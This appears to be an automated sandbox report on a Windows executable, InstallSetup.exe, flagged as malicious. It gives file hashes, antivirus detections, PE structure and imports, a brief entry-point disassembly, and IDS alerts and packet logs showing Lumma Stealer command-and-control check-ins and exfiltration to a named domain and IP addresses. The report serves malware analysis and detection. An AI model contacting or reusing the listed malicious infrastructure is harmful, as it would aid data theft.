                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):4714
                                                                                              Entropy (8bit):4.474926344113723
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:cvIwWl8zstJg77aI9lup1WpW8VYEYm8M4JxK0O3FV+q8vhK0ODrMTzFTTd:uIjfHI73upE7VMJVwKFqrMTzFTTd
                                                                                              MD5:C3BC474F500F67DA38B0B13EB2003047
                                                                                              SHA1:EC0110100B85BE2C6AFF82356CE1C2F36817D2BD
                                                                                              SHA-256:96ED50F13ACE861F0E79132BF0A657F3C0F2D39AC12B2B5CD6BFF065C6EE6813
                                                                                              SHA-512:E34118ACFE81303032B4561C93057F978114B536DAB25E09E81BDE22A4822B9205F980FE3F1A2DE3617DA6DFC120EBF8412C6095D8B728EE2555E9B0AD1601B1
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="636712" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                              Process:C:\Users\user\Desktop\InstallSetup.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):368128
                                                                                              Entropy (8bit):6.68436511005947
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:+3UTQTn7pm2PUwOIvILi6xeyyFz8iO5TwdZ1:+3kQTn1DPwGhyyFz8iowL1
                                                                                              MD5:9026F04B1266851659FB62C91BD7F2F3
                                                                                              SHA1:917DA549856FD1CB8876D6AA97F204F46E42A2FE
                                                                                              SHA-256:174076F434B961EA67DF0480E823246754FAED86EB69B37DD49D7774DDE0113D
                                                                                              SHA-512:B10108A3BCE0D25551E4442BC3E97B61DC84AD58E3DF821792534EB56BEE9E36ADD44984C6C22902098E439413B9C838CC40D9D0E29F3A934DC37BD866D4D38B
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: ReversingLabs, Detection: 68%
                                                                                              Reputation:low
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......wB.A3#..3#..3#...lK.2#..-qY.-#..-qH.'#..-q^.]#.....6#..3#..@#..-qW.2#..-qI.2#..-qL.2#..Rich3#..........PE..L...Xg_e.....................*?...................@..........................0C..............................................(..<.....B..............................................................................................................text............................... ..`.rdata...!......."..................@..@.data.....=..@...p..................@....rsrc.........B.....................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\InstallSetup.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):368128
                                                                                              Entropy (8bit):6.68436511005947
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:+3UTQTn7pm2PUwOIvILi6xeyyFz8iO5TwdZ1:+3kQTn1DPwGhyyFz8iowL1
                                                                                              MD5:9026F04B1266851659FB62C91BD7F2F3
                                                                                              SHA1:917DA549856FD1CB8876D6AA97F204F46E42A2FE
                                                                                              SHA-256:174076F434B961EA67DF0480E823246754FAED86EB69B37DD49D7774DDE0113D
                                                                                              SHA-512:B10108A3BCE0D25551E4442BC3E97B61DC84AD58E3DF821792534EB56BEE9E36ADD44984C6C22902098E439413B9C838CC40D9D0E29F3A934DC37BD866D4D38B
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: ReversingLabs, Detection: 68%
                                                                                              Reputation:low
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......wB.A3#..3#..3#...lK.2#..-qY.-#..-qH.'#..-q^.]#.....6#..3#..@#..-qW.2#..-qI.2#..-qL.2#..Rich3#..........PE..L...Xg_e.....................*?...................@..........................0C..............................................(..<.....B..............................................................................................................text............................... ..`.rdata...!......."..................@..@.data.....=..@...p..................@....rsrc.........B.....................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                                              Category:dropped
                                                                                              Size (bytes):1835008
                                                                                              Entropy (8bit):4.372086625602233
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:AFVfpi6ceLP/9skLmb0ayWWSPtaJG8nAge35OlMMhA2AX4WABlguNuiLm:YV1QyWWI/glMM6kF7Mqm
                                                                                              MD5:18B96F114E593A107BBA822A4ED7F006
                                                                                              SHA1:3910541089F7AC14DA5EE07805CDF72A83BBDC7B
                                                                                              SHA-256:DA90C5E5EB4FADB207E1DBA3E7B62026B7F30D93212A05D1EE45F07EB1080F4C
                                                                                              SHA-512:329B0EE483FBB0039F204D091C4BF8A11C886B6E3BE0BD2D7385C886398D55B56EFCE2DD69D5FDF2685E20BB3808E91374043487E3EB53432E8A797C1701E08D
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview:regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm^y.OKQ...............................................................................................................................................................................................................................................................................................................................................r.{........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Entropy (8bit):7.028752640974782
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                              File name:InstallSetup.exe
                                                                                              File size:436'736 bytes
                                                                                              MD5:8d746459e4ecdc159bd431bbc01e9672
                                                                                              SHA1:7efd87f9513cd69ef9c43fe826895da73a5d679a
                                                                                              SHA256:7d25ec756bbb5bec2e48dd71255de460789057b354de9dfcf6fce4ee2563d3da
                                                                                              SHA512:2572fb1ed6b93e037584c133c662d63857a7912f96ef2a42c979230c47d661bc8b3f54de6da965bb3e48947c0c2e0abe4ad22146199e86e77ce701fcc3d37579
                                                                                              SSDEEP:6144:ewIiV0+zdX91DIfrWMGQn2+MDltVBYVNnHNVHJxCzott/LyxfxaTwdjvH/C:qiVLzdt1UfrDGQn/MDlAtLx86ExawJ6
                                                                                              TLSH:CF94E010B5F19222F7B38A357976E6A05A3BB5732E30959E2368172F0E703D2CD62717
                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......wB.A3#..3#..3#...lK.2#..-qY.-#..-qH.'#..-q^.]#......6#..3#..@#..-qW.2#..-qI.2#..-qL.2#..Rich3#..........PE..L....<_e...........
                                                                                              Icon Hash:46c7c30b0f4e0d19
                                                                                              Entrypoint:0x401a04
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:false
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                              Time Stamp:0x655F3CDB [Thu Nov 23 11:51:55 2023 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:5
                                                                                              OS Version Minor:0
                                                                                              File Version Major:5
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:5
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:17fedc67c91a23016ced8a879a1b9a8c
                                                                                              Instruction
                                                                                              call 00007F81CC7B53B5h
                                                                                              jmp 00007F81CC7B164Dh
                                                                                              mov edi, edi
                                                                                              push ebp
                                                                                              mov ebp, esp
                                                                                              sub esp, 00000328h
                                                                                              mov dword ptr [00456C18h], eax
                                                                                              mov dword ptr [00456C14h], ecx
                                                                                              mov dword ptr [00456C10h], edx
                                                                                              mov dword ptr [00456C0Ch], ebx
                                                                                              mov dword ptr [00456C08h], esi
                                                                                              mov dword ptr [00456C04h], edi
                                                                                              mov word ptr [00456C30h], ss
                                                                                              mov word ptr [00456C24h], cs
                                                                                              mov word ptr [00456C00h], ds
                                                                                              mov word ptr [00456BFCh], es
                                                                                              mov word ptr [00456BF8h], fs
                                                                                              mov word ptr [00456BF4h], gs
                                                                                              pushfd
                                                                                              pop dword ptr [00456C28h]
                                                                                              mov eax, dword ptr [ebp+00h]
                                                                                              mov dword ptr [00456C1Ch], eax
                                                                                              mov eax, dword ptr [ebp+04h]
                                                                                              mov dword ptr [00456C20h], eax
                                                                                              lea eax, dword ptr [ebp+08h]
                                                                                              mov dword ptr [00456C2Ch], eax
                                                                                              mov eax, dword ptr [ebp-00000320h]
                                                                                              mov dword ptr [00456B68h], 00010001h
                                                                                              mov eax, dword ptr [00456C20h]
                                                                                              mov dword ptr [00456B1Ch], eax
                                                                                              mov dword ptr [00456B10h], C0000409h
                                                                                              mov dword ptr [00456B14h], 00000001h
                                                                                              mov eax, dword ptr [00454004h]
                                                                                              mov dword ptr [ebp-00000328h], eax
                                                                                              mov eax, dword ptr [00454008h]
                                                                                              mov dword ptr [ebp-00000324h], eax
                                                                                              call dword ptr [000000BCh]
                                                                                              Programming Language:
                                                                                              • [C++] VS2008 build 21022
                                                                                              • [ASM] VS2008 build 21022
                                                                                              • [ C ] VS2008 build 21022
                                                                                              • [IMP] VS2005 build 50727
                                                                                              • [RES] VS2008 build 21022
                                                                                              • [LNK] VS2008 build 21022
                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x528fc0x3c.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x4310000x112f0.rsrc
                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x524580x40.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x510000x190.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                              .text0x10000x4ffac0x5000008d1594225d59579d15000c29b9b1d00False0.8444610595703125data7.547124008280789IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                              .rdata0x510000x21ee0x22009cb8e8ab9bc5ad79896b2c2f0957bc3fFalse0.36799172794117646data5.5791048271337695IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              .data0x540000x3dc49c0x70000f52e7271309057641b5371a5112169dunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .rsrc0x4310000x112f00x11400775222e062da683a4d4f18725e6beb1fFalse0.5879472373188406data5.800080155895508IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                              RT_ICON0x4315e00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkmenTurkmenistan0.5101279317697228
                                                                                              RT_ICON0x4324880x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkmenTurkmenistan0.5658844765342961
                                                                                              RT_ICON0x432d300x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkmenTurkmenistan0.6002304147465438
                                                                                              RT_ICON0x4333f80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkmenTurkmenistan0.6394508670520231
                                                                                              RT_ICON0x4339600x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkmenTurkmenistan0.4099585062240664
                                                                                              RT_ICON0x435f080x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkmenTurkmenistan0.4793621013133208
                                                                                              RT_ICON0x436fb00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkmenTurkmenistan0.47704918032786886
                                                                                              RT_ICON0x4379380x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkmenTurkmenistan0.5806737588652482
                                                                                              RT_ICON0x437e180xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkmenTurkmenistan0.8275586353944563
                                                                                              RT_ICON0x438cc00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkmenTurkmenistan0.8646209386281588
                                                                                              RT_ICON0x4395680x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkmenTurkmenistan0.7943548387096774
                                                                                              RT_ICON0x439c300x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkmenTurkmenistan0.8692196531791907
                                                                                              RT_ICON0x43a1980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkmenTurkmenistan0.8049792531120332
                                                                                              RT_ICON0x43c7400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkmenTurkmenistan0.8344277673545967
                                                                                              RT_ICON0x43d7e80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkmenTurkmenistan0.844672131147541
                                                                                              RT_ICON0x43e1700x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkmenTurkmenistan0.8643617021276596
                                                                                              RT_STRING0x43e8080x386data0.4567627494456763
                                                                                              RT_STRING0x43eb900xb2data0.601123595505618
                                                                                              RT_STRING0x43ec480x6d0data0.4288990825688073
                                                                                              RT_STRING0x43f3180x71edata0.4313940724478595
                                                                                              RT_STRING0x43fa380x6e2data0.43473325766174803
                                                                                              RT_STRING0x4401200x65cdata0.43611793611793614
                                                                                              RT_STRING0x4407800x71adata0.4251925192519252
                                                                                              RT_STRING0x440ea00x7c8data0.41967871485943775
                                                                                              RT_STRING0x4416680x756data0.4222577209797657
                                                                                              RT_STRING0x441dc00x52edata0.4517345399698341
                                                                                              RT_GROUP_ICON0x43e5d80x76dataTurkmenTurkmenistan0.6694915254237288
                                                                                              RT_GROUP_ICON0x437da00x76dataTurkmenTurkmenistan0.6610169491525424
                                                                                              RT_VERSION0x43e6500x1b4data0.5688073394495413
                                                                                              DLLImport
                                                                                              KERNEL32.dllSetDefaultCommConfigA, SearchPathW, SetLocaleInfoA, SetErrorMode, InterlockedIncrement, InterlockedDecrement, ReadConsoleOutputAttribute, GetEnvironmentStringsW, GetTimeFormatA, SetEvent, GetModuleHandleW, GetDateFormatA, GetCommandLineA, SetProcessPriorityBoost, LoadLibraryW, DeleteVolumeMountPointW, GetConsoleAliasW, GetStartupInfoA, SetLastError, GetProcAddress, SetFileAttributesA, BuildCommDCBW, GetNumaHighestNodeNumber, GetAtomNameA, LoadLibraryA, Process32Next, LocalAlloc, GetFileType, AddAtomW, AddAtomA, FoldStringA, CreatePipe, GetModuleHandleA, OpenFileMappingW, GetShortPathNameW, EndUpdateResourceA, GetVersionExA, FindFirstVolumeW, UnregisterWaitEx, HeapAlloc, MultiByteToWideChar, GetLastError, HeapReAlloc, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapCreate, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, SetHandleCount, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, ReadFile, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, SetStdHandle, CloseHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA
                                                                                              USER32.dllGetProcessDefaultLayout
                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                              TurkmenTurkmenistan
                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                              2024-12-18T13:49:26.142876+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849704172.67.179.207443TCP
                                                                                              2024-12-18T13:49:27.727047+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849705176.113.115.1980TCP
                                                                                              2024-12-18T13:49:31.512750+01002058374ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat)1192.168.2.8652771.1.1.153UDP
                                                                                              2024-12-18T13:49:33.272870+01002058375ET MALWARE Observed Win32/Lumma Stealer Related Domain (rapeflowwj .lat in TLS SNI)1192.168.2.849706172.67.220.223443TCP
                                                                                              2024-12-18T13:49:33.272870+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849706172.67.220.223443TCP
                                                                                              2024-12-18T13:49:33.991819+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.849706172.67.220.223443TCP
                                                                                              2024-12-18T13:49:33.991819+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849706172.67.220.223443TCP
                                                                                              2024-12-18T13:49:35.220835+01002058375ET MALWARE Observed Win32/Lumma Stealer Related Domain (rapeflowwj .lat in TLS SNI)1192.168.2.849707172.67.220.223443TCP
                                                                                              2024-12-18T13:49:35.220835+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849707172.67.220.223443TCP
                                                                                              2024-12-18T13:49:36.045088+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.849707172.67.220.223443TCP
                                                                                              2024-12-18T13:49:36.045088+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849707172.67.220.223443TCP
                                                                                              2024-12-18T13:49:38.123685+01002058375ET MALWARE Observed Win32/Lumma Stealer Related Domain (rapeflowwj .lat in TLS SNI)1192.168.2.849708172.67.220.223443TCP
                                                                                              2024-12-18T13:49:38.123685+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849708172.67.220.223443TCP
                                                                                              2024-12-18T13:49:40.368864+01002058375ET MALWARE Observed Win32/Lumma Stealer Related Domain (rapeflowwj .lat in TLS SNI)1192.168.2.849711172.67.220.223443TCP
                                                                                              2024-12-18T13:49:40.368864+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849711172.67.220.223443TCP
                                                                                              2024-12-18T13:49:41.130163+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.849711172.67.220.223443TCP
                                                                                              2024-12-18T13:49:42.726217+01002058375ET MALWARE Observed Win32/Lumma Stealer Related Domain (rapeflowwj .lat in TLS SNI)1192.168.2.849714172.67.220.223443TCP
                                                                                              2024-12-18T13:49:42.726217+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849714172.67.220.223443TCP
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Dec 18, 2024 13:49:24.003092051 CET49704443192.168.2.8172.67.179.207
                                                                                              Dec 18, 2024 13:49:24.003134012 CET44349704172.67.179.207192.168.2.8
                                                                                              Dec 18, 2024 13:49:24.003235102 CET49704443192.168.2.8172.67.179.207
                                                                                              Dec 18, 2024 13:49:24.015711069 CET49704443192.168.2.8172.67.179.207
                                                                                              Dec 18, 2024 13:49:24.015733004 CET44349704172.67.179.207192.168.2.8
                                                                                              Dec 18, 2024 13:49:25.240678072 CET44349704172.67.179.207192.168.2.8
                                                                                              Dec 18, 2024 13:49:25.240775108 CET49704443192.168.2.8172.67.179.207
                                                                                              Dec 18, 2024 13:49:25.613464117 CET49704443192.168.2.8172.67.179.207
                                                                                              Dec 18, 2024 13:49:25.613497019 CET44349704172.67.179.207192.168.2.8
                                                                                              Dec 18, 2024 13:49:25.613848925 CET44349704172.67.179.207192.168.2.8
                                                                                              Dec 18, 2024 13:49:25.613888979 CET49704443192.168.2.8172.67.179.207
                                                                                              Dec 18, 2024 13:49:25.619827032 CET49704443192.168.2.8172.67.179.207
                                                                                              Dec 18, 2024 13:49:25.667334080 CET44349704172.67.179.207192.168.2.8
                                                                                              Dec 18, 2024 13:49:26.142862082 CET44349704172.67.179.207192.168.2.8
                                                                                              Dec 18, 2024 13:49:26.142935991 CET44349704172.67.179.207192.168.2.8
                                                                                              Dec 18, 2024 13:49:26.143016100 CET49704443192.168.2.8172.67.179.207
                                                                                              Dec 18, 2024 13:49:26.143076897 CET49704443192.168.2.8172.67.179.207
                                                                                              Dec 18, 2024 13:49:26.145106077 CET49704443192.168.2.8172.67.179.207
                                                                                              Dec 18, 2024 13:49:26.145131111 CET44349704172.67.179.207192.168.2.8
                                                                                              Dec 18, 2024 13:49:26.145152092 CET49704443192.168.2.8172.67.179.207
                                                                                              Dec 18, 2024 13:49:26.145178080 CET49704443192.168.2.8172.67.179.207
                                                                                              Dec 18, 2024 13:49:26.279165983 CET4970580192.168.2.8176.113.115.19
                                                                                              Dec 18, 2024 13:49:26.398850918 CET8049705176.113.115.19192.168.2.8
                                                                                              Dec 18, 2024 13:49:26.398933887 CET4970580192.168.2.8176.113.115.19
                                                                                              Dec 18, 2024 13:49:26.399105072 CET4970580192.168.2.8176.113.115.19
                                                                                              Dec 18, 2024 13:49:26.520531893 CET8049705176.113.115.19192.168.2.8
                                                                                              Dec 18, 2024 13:49:27.726911068 CET8049705176.113.115.19192.168.2.8
                                                                                              Dec 18, 2024 13:49:27.726962090 CET8049705176.113.115.19192.168.2.8
                                                                                              Dec 18, 2024 13:49:27.727046967 CET4970580192.168.2.8176.113.115.19
                                                                                              Dec 18, 2024 13:49:27.727072954 CET4970580192.168.2.8176.113.115.19
                                                                                              Dec 18, 2024 13:49:27.727119923 CET8049705176.113.115.19192.168.2.8
                                                                                              Dec 18, 2024 13:49:27.727161884 CET4970580192.168.2.8176.113.115.19
                                                                                              Dec 18, 2024 13:49:27.727166891 CET8049705176.113.115.19192.168.2.8
                                                                                              Dec 18, 2024 13:49:27.727180958 CET8049705176.113.115.19192.168.2.8
                                                                                              Dec 18, 2024 13:49:27.727206945 CET4970580192.168.2.8176.113.115.19
                                                                                              Dec 18, 2024 13:49:27.727220058 CET4970580192.168.2.8176.113.115.19
                                                                                              Dec 18, 2024 13:49:27.727324963 CET8049705176.113.115.19192.168.2.8
                                                                                              Dec 18, 2024 13:49:27.727339029 CET8049705176.113.115.19192.168.2.8
                                                                                              Dec 18, 2024 13:49:27.727368116 CET4970580192.168.2.8176.113.115.19
                                                                                              Dec 18, 2024 13:49:27.727382898 CET8049705176.113.115.19192.168.2.8
                                                                                              Dec 18, 2024 13:49:27.727387905 CET4970580192.168.2.8176.113.115.19
                                                                                              Dec 18, 2024 13:49:27.727395058 CET8049705176.113.115.19192.168.2.8
                                                                                              Dec 18, 2024 13:49:27.727406025 CET8049705176.113.115.19192.168.2.8
                                                                                              Dec 18, 2024 13:49:27.727421045 CET4970580192.168.2.8176.113.115.19
                                                                                              Dec 18, 2024 13:49:27.729582071 CET4970580192.168.2.8176.113.115.19
                                                                                              Dec 18, 2024 13:49:27.847012997 CET8049705176.113.115.19192.168.2.8
                                                                                              Dec 18, 2024 13:49:27.847028017 CET8049705176.113.115.19192.168.2.8
                                                                                              Dec 18, 2024 13:49:27.847100973 CET4970580192.168.2.8176.113.115.19
                                                                                              Dec 18, 2024 13:49:27.851058960 CET8049705176.113.115.19192.168.2.8
                                                                                              Dec 18, 2024 13:49:27.851119995 CET4970580192.168.2.8176.113.115.19
                                                                                              Dec 18, 2024 13:49:27.851144075 CET8049705176.113.115.19192.168.2.8
                                                                                              Dec 18, 2024 13:49:27.851195097 CET4970580192.168.2.8176.113.115.19
                                                                                              Dec 18, 2024 13:49:27.859695911 CET8049705176.113.115.19192.168.2.8
                                                                                              Dec 18, 2024 13:49:27.859781027 CET4970580192.168.2.8176.113.115.19
                                                                                              Dec 18, 2024 13:49:27.919183969 CET8049705176.113.115.19192.168.2.8
                                                                                              Dec 18, 2024 13:49:27.919277906 CET4970580192.168.2.8176.113.115.19
                                                                                              Dec 18, 2024 13:49:27.919354916 CET8049705176.113.115.19192.168.2.8
                                                                                              Dec 18, 2024 13:49:27.919405937 CET4970580192.168.2.8176.113.115.19
                                                                                              Dec 18, 2024 13:49:27.921986103 CET8049705176.113.115.19192.168.2.8
                                                                                              Dec 18, 2024 13:49:27.922029972 CET4970580192.168.2.8176.113.115.19
                                                                                              Dec 18, 2024 13:49:27.922101021 CET8049705176.113.115.19192.168.2.8
                                                                                              Dec 18, 2024 13:49:27.922142029 CET4970580192.168.2.8176.113.115.19
                                                                                              Dec 18, 2024 13:49:27.930269957 CET8049705176.113.115.19192.168.2.8
                                                                                              Dec 18, 2024 13:49:27.930346012 CET4970580192.168.2.8176.113.115.19
                                                                                              Dec 18, 2024 13:49:27.930507898 CET8049705176.113.115.19192.168.2.8
                                                                                              Dec 18, 2024 13:49:27.930562019 CET4970580192.168.2.8176.113.115.19
                                                                                              Dec 18, 2024 13:49:27.938741922 CET8049705176.113.115.19192.168.2.8
                                                                                              Dec 18, 2024 13:49:27.938791990 CET8049705176.113.115.19192.168.2.8
                                                                                              Dec 18, 2024 13:49:27.938831091 CET4970580192.168.2.8176.113.115.19
                                                                                              Dec 18, 2024 13:49:27.938858032 CET4970580192.168.2.8176.113.115.19
                                                                                              Dec 18, 2024 13:49:27.947264910 CET8049705176.113.115.19192.168.2.8
                                                                                              Dec 18, 2024 13:49:27.947319031 CET4970580192.168.2.8176.113.115.19
                                                                                              Dec 18, 2024 13:49:27.947521925 CET8049705176.113.115.19192.168.2.8
                                                                                              Dec 18, 2024 13:49:27.947563887 CET4970580192.168.2.8176.113.115.19
                                                                                              Dec 18, 2024 13:49:27.955789089 CET8049705176.113.115.19192.168.2.8
                                                                                              Dec 18, 2024 13:49:27.955835104 CET4970580192.168.2.8176.113.115.19
                                                                                              Dec 18, 2024 13:49:27.955966949 CET8049705176.113.115.19192.168.2.8
                                                                                              Dec 18, 2024 13:49:27.956104994 CET4970580192.168.2.8176.113.115.19
                                                                                              Dec 18, 2024 13:49:27.964293957 CET8049705176.113.115.19192.168.2.8
                                                                                              Dec 18, 2024 13:49:27.964359045 CET8049705176.113.115.19192.168.2.8
                                                                                              Dec 18, 2024 13:49:27.964359999 CET4970580192.168.2.8176.113.115.19
                                                                                              Dec 18, 2024 13:49:27.964390039 CET4970580192.168.2.8176.113.115.19
                                                                                              Dec 18, 2024 13:49:27.972969055 CET8049705176.113.115.19192.168.2.8
                                                                                              Dec 18, 2024 13:49:27.972990990 CET8049705176.113.115.19192.168.2.8
                                                                                              Dec 18, 2024 13:49:27.973038912 CET4970580192.168.2.8176.113.115.19
                                                                                              Dec 18, 2024 13:49:27.973057985 CET4970580192.168.2.8176.113.115.19
                                                                                              Dec 18, 2024 13:49:27.980526924 CET8049705176.113.115.19192.168.2.8
                                                                                              Dec 18, 2024 13:49:27.980576038 CET8049705176.113.115.19192.168.2.8
                                                                                              Dec 18, 2024 13:49:27.980598927 CET4970580192.168.2.8176.113.115.19
                                                                                              Dec 18, 2024 13:49:27.980618000 CET4970580192.168.2.8176.113.115.19
                                                                                              Dec 18, 2024 13:49:27.988333941 CET8049705176.113.115.19192.168.2.8
                                                                                              Dec 18, 2024 13:49:27.988356113 CET8049705176.113.115.19192.168.2.8
                                                                                              Dec 18, 2024 13:49:27.988419056 CET4970580192.168.2.8176.113.115.19
                                                                                              Dec 18, 2024 13:49:27.988445044 CET4970580192.168.2.8176.113.115.19
                                                                                              Dec 18, 2024 13:49:27.995892048 CET8049705176.113.115.19192.168.2.8
